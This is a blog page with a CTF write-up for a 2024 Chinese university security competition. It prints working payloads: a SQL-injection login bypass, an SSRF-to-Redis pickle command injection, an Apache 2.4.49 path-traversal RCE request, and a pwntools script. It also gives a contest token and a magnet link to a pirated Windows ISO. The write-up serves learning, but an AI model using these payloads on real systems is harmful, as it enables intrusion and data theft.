

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/url.jpg">
  <link rel="icon" href="/img/url.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="J_0k3r">
  <meta name="keywords" content="">
  
    <meta name="description" content="其实地球没有你 站到虚脱便会飞 -《黑暗中漫舞》">
<meta property="og:type" content="article">
<meta property="og:title" content="2024年高校网络安全管理运维赛——实践能力赛">
<meta property="og:url" content="http://example.com/2024/05/07/2024%E5%B9%B4%E9%AB%98%E6%A0%A1%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E8%BF%90%E7%BB%B4%E8%B5%9B%E2%80%94%E2%80%94%E5%AE%9E%E8%B7%B5%E8%83%BD%E5%8A%9B%E8%B5%9B/index.html">
<meta property="og:site_name" content="J_0k3r">
<meta property="og:description" content="其实地球没有你 站到虚脱便会飞 -《黑暗中漫舞》">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/Shall-We-Dance-Shall-We-Talk.jpg">
<meta property="article:published_time" content="2024-05-07T05:14:59.000Z">
<meta property="article:modified_time" content="2024-05-07T11:38:26.427Z">
<meta property="article:author" content="J_0k3r">
<meta property="article:tag" content="比赛Write Up">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/Shall-We-Dance-Shall-We-Talk.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>2024年高校网络安全管理运维赛——实践能力赛 - J_0k3r</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":180,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"python"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"41fc030db57d5570dd22f78997dc4a7e","google":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":true},"gtag":null},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?41fc030db57d5570dd22f78997dc4a7e";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>J_0k3r的无人之境</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/playlist/" target="_self">
                <i class="iconfont icon-music"></i>
                <span>音乐</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/hazmw.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2024年高校网络安全管理运维赛——实践能力赛"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        J_0k3r
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-05-07 13:14" pubdate>
          2024年5月7日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          10 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">2024年高校网络安全管理运维赛——实践能力赛</h1>
            
            
              <div class="markdown-body">
                
                <p> <a target="_blank" rel="noopener" href="https://codeload.github.com/J-0k3r/1/zip/refs/heads/main">misc附件</a></p>
<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h3 id="phpsql"><a href="#phpsql" class="headerlink" title="phpsql"></a>phpsql</h3><p>登录页面，密码输入单引号会报错，密码处存在sql注入<br>测试了一下，过滤了空格<br><code>admin</code><br><code>&#39;or&#39;&#39;=&#39;</code><br>登录<br><img src="/mdimg/2024yw/1715065549182-53c222a1-20be-4a68-8418-85d420fe1420.jpeg" srcset="/img/loading.gif" lazyload></p>
<h3 id="pyssrf"><a href="#pyssrf" class="headerlink" title="pyssrf"></a>pyssrf</h3><p>嗷，我的上帝，怎么还会有人在用python:3.7.1。flag文件位置：/flag<br>源码<br><img src="/mdimg/2024yw/1715065749463-6bfd4366-dc1d-4c59-93eb-0749620c4d00.jpeg" srcset="/img/loading.gif" lazyload><br>Ssrf打redis</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> hashlib<br>code=<span class="hljs-string">&#x27;&#x27;&#x27;(S&#x27;mkdir ./static;cat /flag&gt;./static/txt&#x27;</span><br><span class="hljs-string">ios</span><br><span class="hljs-string">system</span><br><span class="hljs-string">.&#x27;&#x27;&#x27;</span>.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>key=hashlib.md5(<span class="hljs-string">&quot;http://x/&quot;</span>.encode()).hexdigest()<br>value=base64.b64encode(code).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;127.0.0.1:6379?%0d%0aset%20&#x27;</span>+key+<span class="hljs-string">&#x27;%20&#x27;</span>+value+<span class="hljs-string">&#x27;%0d%0apadding%0d%0a&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p><img src="/mdimg/2024yw/1715065628208-df4b685c-8e23-4af0-851a-698f669adadb.jpeg" srcset="/img/loading.gif" lazyload><br><img src="/mdimg/2024yw/1715065636054-e2d3e765-16bd-40f1-9759-84036e2cf3c8.jpeg" srcset="/img/loading.gif" lazyload><br><img src="/mdimg/2024yw/1715065643653-77db3d6d-8d17-47e2-a23d-f4a049ff01ef.jpeg" srcset="/img/loading.gif" lazyload><br><img src="/mdimg/2024yw/1715065652648-92d905ca-abc3-4a6c-90be-6d09b79de265.jpeg" srcset="/img/loading.gif" lazyload><br>打开下载的txt得到flag</p>
<h3 id="fileit"><a href="#fileit" class="headerlink" title="fileit"></a>fileit</h3><p>flag保存在根目录的flag文件中</p>
<h1 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h1><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><p>逐帧提取 然后解rot13<br><img src="/mdimg/2024yw/1715066360969-d5b67cff-67be-4570-880c-3249ba9714df.jpeg" srcset="/img/loading.gif" lazyload></p>
<h3 id="钓鱼邮件识别"><a href="#钓鱼邮件识别" class="headerlink" title="钓鱼邮件识别"></a>钓鱼邮件识别</h3><p><img src="/mdimg/2024yw/1715066412525-deda819b-3f41-4c0e-b68c-7ca2a76b4bab.jpeg" srcset="/img/loading.gif" lazyload><br><img src="/mdimg/2024yw/1715066419007-fcf0189c-7708-46e8-927c-4bafe490e09e.jpeg" srcset="/img/loading.gif" lazyload><br><code>flag&#123;WElcoMEto&#125;</code><br><img src="/mdimg/2024yw/1715066435790-18822c32-281b-452a-8cd2-172fe1cd4e7e.jpeg" srcset="/img/loading.gif" lazyload><br><code>flag&#123;PhIshhuntInG&#125;</code><br><img src="/mdimg/2024yw/1715066449097-c3f1893f-2574-473b-b753-831bbb15e37f.jpeg" srcset="/img/loading.gif" lazyload><br><img src="/mdimg/2024yw/1715066456790-8d9f714e-5d58-4301-b5aa-854c396a3943.jpeg" srcset="/img/loading.gif" lazyload><br><code>&#123;N0wY0u</code><br><img src="/mdimg/2024yw/1715066473283-5ad1698c-9af9-444d-b4a7-541ed4435917.jpeg" srcset="/img/loading.gif" lazyload><br><code>_Kn0wH0wt0_</code><br><img src="/mdimg/2024yw/1715066494047-75b52fec-85a4-4ac0-8fa6-fe53e58c25d0.jpeg" srcset="/img/loading.gif" lazyload><br><code>ANAlys1sDNS&#125;</code><br><code>flag&#123;N0wY0u_Kn0wH0wt0_ANAlys1sDNS&#125;</code></p>
<h3 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h3><p><img src="/mdimg/2024yw/15622d47-847a-4799-b7a2-cb10cb79e43e.jpg" srcset="/img/loading.gif" lazyload></p>
<p>附件有一个dockerfile 显示的是apache 2.4.49版本，发现一个rce漏洞</p>
<p><img src="/mdimg/2024yw/28d926d9-4e95-4f87-a29c-a156c8138bc7.png" srcset="/img/loading.gif" lazyload></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/293172.html">https://www.freebuf.com/articles/web/293172.html</a><br><img src="/mdimg/2024yw/1715066537536-17358bca-326d-4887-86ee-6afe9ee55c63.jpeg" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">curl -X POST <span class="hljs-string">&quot;靶机url/nc&quot;</span> -d <span class="hljs-string">&quot;port=80&amp;data=POST%20/cgi-bin/.%252e/.%252e/.%252e/.%252e/bin/sh%20HTTP/1.1%0D%0AHost:%20127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2014%0D%0AConnection:%20close%0D%0A%0D%0Aecho;cat%20/flag&quot;</span><br></code></pre></td></tr></table></figure>
<h3 id="Gateway"><a href="#Gateway" class="headerlink" title="Gateway"></a>Gateway</h3><p><img src="/mdimg/2024yw/1715066558857-6753dc7c-1330-4b46-b51e-c3b04d1f5a2f.jpeg" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-number">106</span>&amp;<span class="hljs-number">112</span>&amp;<span class="hljs-number">101</span>&amp;<span class="hljs-number">107</span>&amp;<span class="hljs-number">127</span>&amp;<span class="hljs-number">101</span>&amp;<span class="hljs-number">104</span>&amp;<span class="hljs-number">49</span>&amp;<span class="hljs-number">57</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">53</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">54</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">49</span>&amp;<span class="hljs-number">51</span>&amp;<span class="hljs-number">51</span>&amp;<span class="hljs-number">105</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">103</span>&amp;<span class="hljs-number">106</span>&amp;<span class="hljs-number">49</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">50</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">103</span>&amp;<span class="hljs-number">102</span>&amp;<span class="hljs-number">56</span>&amp;<span class="hljs-number">52</span>&amp;<span class="hljs-number">101</span>&amp;<span class="hljs-number">104</span>&amp;<span class="hljs-number">102</span>&amp;<span class="hljs-number">105</span>&amp;<span class="hljs-number">53</span>&amp;<span class="hljs-number">101</span>&amp;<span class="hljs-number">53</span>&amp;<span class="hljs-number">102</span>&amp;<span class="hljs-number">129</span>&amp;<br></code></pre></td></tr></table></figure>
<p>Ascii然后凯撒<br><img src="/mdimg/2024yw/1715066576146-ed45c1f9-9bf6-4137-b30f-5cf5e95350c9.jpeg" srcset="/img/loading.gif" lazyload><br><code>flag&#123;ad1985868133e8cf1828cb84adbe5a5b&#125;</code></p>
<h3 id="f-or-r"><a href="#f-or-r" class="headerlink" title="f or r"></a>f or r</h3><p>参考<a target="_blank" rel="noopener" href="https://qanux.github.io/2024/04/22/geek2024/index.html">https://qanux.github.io/2024/04/22/geek2024/index.html</a><br>下载下面版本的curl<br>magnet:?xt=urn:btih:f98cc874544405d3f4598637df263d0b0431eb2a&amp;dn=zh-cn_windows_10_business_editions_version_22h2_updated_april_2024_x64_dvd_a2873093.iso&amp;xl=6433263616<br><img src="/mdimg/2024yw/1715066604570-998dd29b-c202-46a1-b87b-28c8273be1b3.jpeg" srcset="/img/loading.gif" lazyload><br>进入到这个amd的目录，把里面的curl.exe和里面复制出来，把r文件夹里面的curl.exe覆盖到题目的r文件夹<br><img src="/mdimg/2024yw/1715066616222-c3698872-a902-49d4-b355-ccf73564bb18.jpeg" srcset="/img/loading.gif" lazyload><br><code>flag&#123;dc1d03c554150acedca6d71ce394&#125;</code></p>
<h3 id="zip"><a href="#zip" class="headerlink" title="zip"></a>zip</h3><p>程序把队伍token当压缩包密码用，但是压缩包密码要和token相同，又不能超过64个字符，否则会导致压缩失败，所以取token的前64个字符就可以了。<br>由于flag不在根目录，要从tmp/flag压缩之后再解压到根目录才能读取<br>而程序实现flag的打印逻辑也有问题：输入的是flag{，后面无论是什么内容都能通过进而打印flag<br>现在要实现的是：既要使得压缩包能用正确密码（token前64位）解压，又要能绕过flag验证，即密码开头必须是flag{才能打印<br>看似矛盾，但由于压缩过程是开了一个tty终端，所以可以用DEL控制字符实现： 输入flag{，然后再把这几个字符删了，再输入token</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>file = <span class="hljs-string">&#x27;./myzip&#x27;</span><br>elf = ELF(file)<br><span class="hljs-comment"># p = process(file)</span><br>lk = <span class="hljs-string">&#x27;prob03.contest.pku.edu.cn 10003&#x27;</span>.split()<br>p = remote(lk[<span class="hljs-number">0</span>], lk[<span class="hljs-number">1</span>])<br><br>token = <span class="hljs-string">b&#x27;544:MEUCIQDR1sW8U1MtsM5rnFP9rV3_UF2yy5aC1AbtgEbFqhvTGAIgJ2YEU8nSR_OKa2iIpIDrWUOAOkgaC3h8PFjtFUgOrq8=&#x27;</span><br><br>p.sendline(token)<br>sleep(<span class="hljs-number">1</span>)<br>p.sendlineafter(<span class="hljs-string">b&#x27;your token&#x27;</span>, token[:<span class="hljs-number">64</span>])<br>exp = flat(<br>    <span class="hljs-string">b&#x27;flag&#123;&#x27;</span>,<br>    <span class="hljs-string">b&#x27;\x7f&#x27;</span>*<span class="hljs-number">5</span>,<br>    token[:<span class="hljs-number">64</span>]<br>)<br>p.sendlineafter(<span class="hljs-string">b&quot;your flag&quot;</span>, exp)<br>p.interactive()<br><span class="hljs-comment"># flag&#123;n3V3r-90nN4-91v3-Y0U-UP&#125;</span><br></code></pre></td></tr></table></figure>
<h3 id="SecretDB"><a href="#SecretDB" class="headerlink" title="SecretDB"></a>SecretDB</h3><p>010打开，几乎都是空数据<br>在有数据的块里面找到了相似的结构010f<br><img src="/mdimg/2024yw/1715066669990-30200f39-5ec9-4e06-8f20-f8dabc6cf386.jpeg" srcset="/img/loading.gif" lazyload><br>尝试发现010f后的第一个字节是顺序第二个字节是数据，如第一个17 2D表示第17位是-<br>把数据都记录出来</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python">data_lines = [<br>    (<span class="hljs-string">&#x27;17&#x27;</span>, <span class="hljs-string">&#x27;2d&#x27;</span>), (<span class="hljs-string">&#x27;0e&#x27;</span>, <span class="hljs-string">&#x27;39&#x27;</span>), (<span class="hljs-string">&#x27;1b&#x27;</span>, <span class="hljs-string">&#x27;37&#x27;</span>), (<span class="hljs-string">&#x27;10&#x27;</span>, <span class="hljs-string">&#x27;33&#x27;</span>), (<span class="hljs-string">&#x27;0a&#x27;</span>, <span class="hljs-string">&#x27;62&#x27;</span>),<br>    (<span class="hljs-string">&#x27;19&#x27;</span>, <span class="hljs-string">&#x27;32&#x27;</span>), (<span class="hljs-string">&#x27;14&#x27;</span>, <span class="hljs-string">&#x27;62&#x27;</span>), (<span class="hljs-string">&#x27;0f&#x27;</span>, <span class="hljs-string">&#x27;32&#x27;</span>), (<span class="hljs-string">&#x27;12&#x27;</span>, <span class="hljs-string">&#x27;2d&#x27;</span>), (<span class="hljs-string">&#x27;23&#x27;</span>, <span class="hljs-string">&#x27;34&#x27;</span>),<br>    (<span class="hljs-string">&#x27;16&#x27;</span>, <span class="hljs-string">&#x27;36&#x27;</span>), (<span class="hljs-string">&#x27;1f&#x27;</span>, <span class="hljs-string">&#x27;61&#x27;</span>), (<span class="hljs-string">&#x27;25&#x27;</span>, <span class="hljs-string">&#x27;38&#x27;</span>), (<span class="hljs-string">&#x27;02&#x27;</span>, <span class="hljs-string">&#x27;61&#x27;</span>), (<span class="hljs-string">&#x27;1e&#x27;</span>, <span class="hljs-string">&#x27;66&#x27;</span>),<br>    (<span class="hljs-string">&#x27;05&#x27;</span>, <span class="hljs-string">&#x27;66&#x27;</span>), (<span class="hljs-string">&#x27;03&#x27;</span>, <span class="hljs-string">&#x27;67&#x27;</span>), (<span class="hljs-string">&#x27;11&#x27;</span>, <span class="hljs-string">&#x27;63&#x27;</span>), (<span class="hljs-string">&#x27;0c&#x27;</span>, <span class="hljs-string">&#x27;30&#x27;</span>), (<span class="hljs-string">&#x27;04&#x27;</span>, <span class="hljs-string">&#x27;7b&#x27;</span>),<br>    (<span class="hljs-string">&#x27;22&#x27;</span>, <span class="hljs-string">&#x27;61&#x27;</span>), (<span class="hljs-string">&#x27;21&#x27;</span>, <span class="hljs-string">&#x27;62&#x27;</span>), (<span class="hljs-string">&#x27;07&#x27;</span>, <span class="hljs-string">&#x27;32&#x27;</span>), (<span class="hljs-string">&#x27;1d&#x27;</span>, <span class="hljs-string">&#x27;66&#x27;</span>), (<span class="hljs-string">&#x27;26&#x27;</span>, <span class="hljs-string">&#x27;66&#x27;</span>),<br>    (<span class="hljs-string">&#x27;1c&#x27;</span>, <span class="hljs-string">&#x27;2d&#x27;</span>), (<span class="hljs-string">&#x27;09&#x27;</span>, <span class="hljs-string">&#x27;31&#x27;</span>), (<span class="hljs-string">&#x27;27&#x27;</span>, <span class="hljs-string">&#x27;30&#x27;</span>), (<span class="hljs-string">&#x27;0d&#x27;</span>, <span class="hljs-string">&#x27;2d&#x27;</span>), (<span class="hljs-string">&#x27;0b&#x27;</span>, <span class="hljs-string">&#x27;66&#x27;</span>),<br>    (<span class="hljs-string">&#x27;08&#x27;</span>, <span class="hljs-string">&#x27;39&#x27;</span>), (<span class="hljs-string">&#x27;13&#x27;</span>, <span class="hljs-string">&#x27;34&#x27;</span>), (<span class="hljs-string">&#x27;29&#x27;</span>, <span class="hljs-string">&#x27;7d&#x27;</span>), (<span class="hljs-string">&#x27;15&#x27;</span>, <span class="hljs-string">&#x27;61&#x27;</span>), (<span class="hljs-string">&#x27;28&#x27;</span>, <span class="hljs-string">&#x27;62&#x27;</span>),<br>    (<span class="hljs-string">&#x27;06&#x27;</span>, <span class="hljs-string">&#x27;36&#x27;</span>), (<span class="hljs-string">&#x27;1a&#x27;</span>, <span class="hljs-string">&#x27;64&#x27;</span>), (<span class="hljs-string">&#x27;24&#x27;</span>, <span class="hljs-string">&#x27;65&#x27;</span>), (<span class="hljs-string">&#x27;20&#x27;</span>, <span class="hljs-string">&#x27;62&#x27;</span>)<br>]<br><br>result_string = <span class="hljs-string">&#x27;&#x27;</span><br><br><span class="hljs-keyword">for</span> index_hex, char_hex <span class="hljs-keyword">in</span> data_lines:<br>    index = <span class="hljs-built_in">int</span>(index_hex, <span class="hljs-number">16</span>)<br>    char_code = <span class="hljs-built_in">int</span>(char_hex, <span class="hljs-number">16</span>)<br>    <br>    <span class="hljs-keyword">while</span> <span class="hljs-built_in">len</span>(result_string) &lt;= index:<br>        result_string += <span class="hljs-string">&#x27; &#x27;</span><br>    <br>    result_string = result_string[:index] + <span class="hljs-built_in">chr</span>(char_code) + result_string[index+<span class="hljs-number">1</span>:]<br><br><span class="hljs-built_in">print</span>(result_string)<br><span class="hljs-comment">#  ag&#123;f6291bf0-923c-4ba6- 2d7-ffabba4e8f0b&#125;</span><br></code></pre></td></tr></table></figure>
<p>发现第三个-后面2d前面缺了一位，补上8 flag正确<br><code>flag&#123;f6291bf0-923c-4ba6-82d7-ffabba4e8f0b&#125;</code></p>
<h3 id="easyshell"><a href="#easyshell" class="headerlink" title="easyshell"></a>easyshell</h3><p>冰蝎流量</p>
<p><img src="/mdimg/2024yw/download.png" srcset="/img/loading.gif" lazyload></p>
<p>在1278流中得到压缩包</p>
<p>aes解密再解base64解密两次，保存压缩包</p>
<p><img src="/mdimg/2024yw/download1.png" srcset="/img/loading.gif" lazyload></p>
<p>得到</p>
<p><img src="/mdimg/2024yw/download2.png" srcset="/img/loading.gif" lazyload></p>
<p>在这个1982流得到信息</p>
<p><img src="/mdimg/2024yw/download3.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">Hello, but what yo<span class="hljs-string">u&#x27;re looking for isn&#x27;</span>t me.<br></code></pre></td></tr></table></figure>

<p>使用下面的方法压缩上面字符保存的txt</p>
<p><img src="/mdimg/2024yw/download4.png" srcset="/img/loading.gif" lazyload></p>
<p>crc相同，明文攻击</p>
<p><img src="/mdimg/2024yw/download5.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/mdimg/2024yw/download0.png" srcset="/img/loading.gif" lazyload></p>
<p>得到压缩包密码<code>A8s123/+*</code></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;<span class="hljs-number">70854278</span>-ea0c-<span class="hljs-number">462</span>e-bc18-<span class="hljs-number">468</span>c7a04a505&#125;<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  
    <span>></span>
    
  <a href="/categories/CTF/%E6%AF%94%E8%B5%9BWrite-Up/" class="category-chain-item">比赛Write Up</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%AF%94%E8%B5%9BWrite-Up/" class="print-no-link">#比赛Write Up</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2024年高校网络安全管理运维赛——实践能力赛</div>
      <div>http://example.com/2024/05/07/2024年高校网络安全管理运维赛——实践能力赛/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>J_0k3r</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年5月7日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              BY J_0K3R 
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/05/02/%E8%AE%B0%E4%B8%80%E6%AC%A1bugku%20S2%20AWD%E6%8E%92%E4%BD%8D%E8%B5%9B-21%20web/" title="记一次bugku S2 AWD排位赛-21 web">
                        <span class="hidden-mobile">记一次bugku S2 AWD排位赛-21 web</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
